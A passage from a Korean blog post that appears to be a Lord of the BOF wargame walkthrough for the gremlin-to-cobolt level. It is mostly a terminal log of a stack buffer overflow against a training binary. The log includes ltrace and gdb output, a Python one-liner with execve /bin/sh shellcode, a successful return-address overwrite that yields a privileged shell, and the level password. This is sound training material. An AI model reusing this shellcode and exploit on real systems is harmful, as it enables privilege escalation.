ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] greblin->cobolt
    공부/LOB 2014. 7. 30. 20:00

    login: gremlin
    Password:
    Last login: Thu May 22 18:04:55 from 192.168.135.1
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c
    [gremlin@localhost gremlin]$ cat cobolt.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - cobolt
            - small buffer
    */

    int main(int argc, char *argv[])
    {
        char buffer[16];
        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
    [gremlin@localhost gremlin]$ ltrace -i ./cobolt aaaa
    Can't execute `./cobolt': Operation not permitted
    [gremlin@localhost gremlin]$ cp cobolt oo
    [gremlin@localhost gremlin]$ ltrace -i ./oo aaaa
    [080483a1] __libc_start_main(0x08048430, 2, 0xbffffb84, 0x080482e0, 0x080484ac <unfinished ...>
    [0804841b] __register_frame_info(0x080494ec, 0x080495c8, 0xbffffb44, 0x08048305, 0x401081ec) = 0x40108d40
    [08048465] strcpy(0xbffffb28, "aaaa")             = 0xbffffb28
    [08048476] printf("%s\n", "aaaa"aaaa
    )                 = 5
    [080483ea] __deregister_frame_info(0x080494ec, 0xbffffb20, 0x080484c1, 0x401081ec, 0xbffffb34) = 0x080495c8
    [ffffffff] +++ exited (status 5) +++
    [gremlin@localhost gremlin]$ ./cobolt `python -c 'print "a"*20+"\x2b\xfb\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
    aaaaaaaaaaaaaaaaaaaa+
    Segmentation fault
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c  oo
    [gremlin@localhost gremlin]$ gdb oo
    GNU gdb 19991004
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x8048430 <main>:    push   %ebp
    0x8048431 <main+1>:    mov    %esp,%ebp
    0x8048433 <main+3>:    sub    $0x10,%esp
    0x8048436 <main+6>:    cmpl   $0x1,0x8(%ebp)
    0x804843a <main+10>:    jg     0x8048453 <main+35>
    0x804843c <main+12>:    push   $0x80484d0
    0x8048441 <main+17>:    call   0x8048350 <printf>
    0x8048446 <main+22>:    add    $0x4,%esp
    0x8048449 <main+25>:    push   $0x0
    0x804844b <main+27>:    call   0x8048360 <exit>
    0x8048450 <main+32>:    add    $0x4,%esp
    0x8048453 <main+35>:    mov    0xc(%ebp),%eax
    0x8048456 <main+38>:    add    $0x4,%eax
    0x8048459 <main+41>:    mov    (%eax),%edx
    0x804845b <main+43>:    push   %edx
    0x804845c <main+44>:    lea    0xfffffff0(%ebp),%eax
    0x804845f <main+47>:    push   %eax
    0x8048460 <main+48>:    call   0x8048370 <strcpy>
    0x8048465 <main+53>:    add    $0x8,%esp
    0x8048468 <main+56>:    lea    0xfffffff0(%ebp),%eax
    0x804846b <main+59>:    push   %eax
    0x804846c <main+60>:    push   $0x80484dc
    0x8048471 <main+65>:    call   0x8048350 <printf>
    0x8048476 <main+70>:    add    $0x8,%esp
    0x8048479 <main+73>:    leave 
    0x804847a <main+74>:    ret   
    0x804847b <main+75>:    nop   
    0x804847c <main+76>:    nop   
    0x804847d <main+77>:    nop   
    0x804847e <main+78>:    nop   
    0x804847f <main+79>:    nop   
    End of assembler dump.
    (gdb)
    Dump of assembler code for function main:
    0x8048430 <main>:    push   %ebp
    0x8048431 <main+1>:    mov    %esp,%ebp
    0x8048433 <main+3>:    sub    $0x10,%esp
    0x8048436 <main+6>:    cmpl   $0x1,0x8(%ebp)
    0x804843a <main+10>:    jg     0x8048453 <main+35>
    0x804843c <main+12>:    push   $0x80484d0
    0x8048441 <main+17>:    call   0x8048350 <printf>
    0x8048446 <main+22>:    add    $0x4,%esp
    0x8048449 <main+25>:    push   $0x0
    0x804844b <main+27>:    call   0x8048360 <exit>
    0x8048450 <main+32>:    add    $0x4,%esp
    0x8048453 <main+35>:    mov    0xc(%ebp),%eax
    0x8048456 <main+38>:    add    $0x4,%eax
    0x8048459 <main+41>:    mov    (%eax),%edx
    0x804845b <main+43>:    push   %edx
    0x804845c <main+44>:    lea    0xfffffff0(%ebp),%eax
    0x804845f <main+47>:    push   %eax
    0x8048460 <main+48>:    call   0x8048370 <strcpy>
    0x8048465 <main+53>:    add    $0x8,%esp
    0x8048468 <main+56>:    lea    0xfffffff0(%ebp),%eax
    0x804846b <main+59>:    push   %eax
    0x804846c <main+60>:    push   $0x80484dc
    0x8048471 <main+65>:    call   0x8048350 <printf>
    0x8048476 <main+70>:    add    $0x8,%esp
    0x8048479 <main+73>:    leave 
    0x804847a <main+74>:    ret   
    0x804847b <main+75>:    nop   
    0x804847c <main+76>:    nop   
    0x804847d <main+77>:    nop   
    0x804847e <main+78>:    nop   
    0x804847f <main+79>:    nop   
    End of assembler dump.
    (gdb) ls
    Undefined command: "ls".  Try "help".
    (gdb) b *main+56
    Breakpoint 1 at 0x8048468
    (gdb) r 1234
    Starting program: /home/gremlin/oo 1234

    Breakpoint 1, 0x8048468 in main ()
    (gdb) x/8x $esp
    0xbffffb28:    0x34333231    0x08048400    0x080494ec    0x08049500
    0xbffffb38:    0xbffffb58    0x400309cb    0x00000002    0xbffffb84
    (gdb) Quit
    (gdb) q
    The program is running.  Exit anyway? (y or n) y
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c  oo
    [gremlin@localhost gremlin]$ ./egg
    Using address: 0xbffffb18
    [gremlin@localhost gremlin]$ ./addr
    addr : 0xbffff5d5
    [gremlin@localhost gremlin]$          
    [gremlin@localhost gremlin]$ bash2
    [gremlin@localhost gremlin]$ ./cobolt `python -c'print "a"*20+"\xd5\xf5\xff\xbf"'`
    aaaaaaaaaaaaaaaaaaaa曆
    bash$ ls
    ls: .: Permission denied
    bash$ my-pass
    euid = 502
    hacking exposed
    bash$
    bash$ id
    uid=502(cobolt) gid=501(gremlin) egid=502(cobolt) groups=501(gremlin)
    bash$

    '공부 > LOB' 카테고리의 다른 글

    [lob] wolfman -> darkelf  (0) 2014.07.30
    [lob] orc -> wolfman  (0) 2014.07.30
    [lob]goblin->orc  (0) 2014.07.30
    [lob]cobolt->goblin  (0) 2014.07.30
    [lob] greblin->cobolt  (0) 2014.07.30
    [lob] gate->gremlin  (0) 2014.07.30

    댓글 0

Designed by Tistory.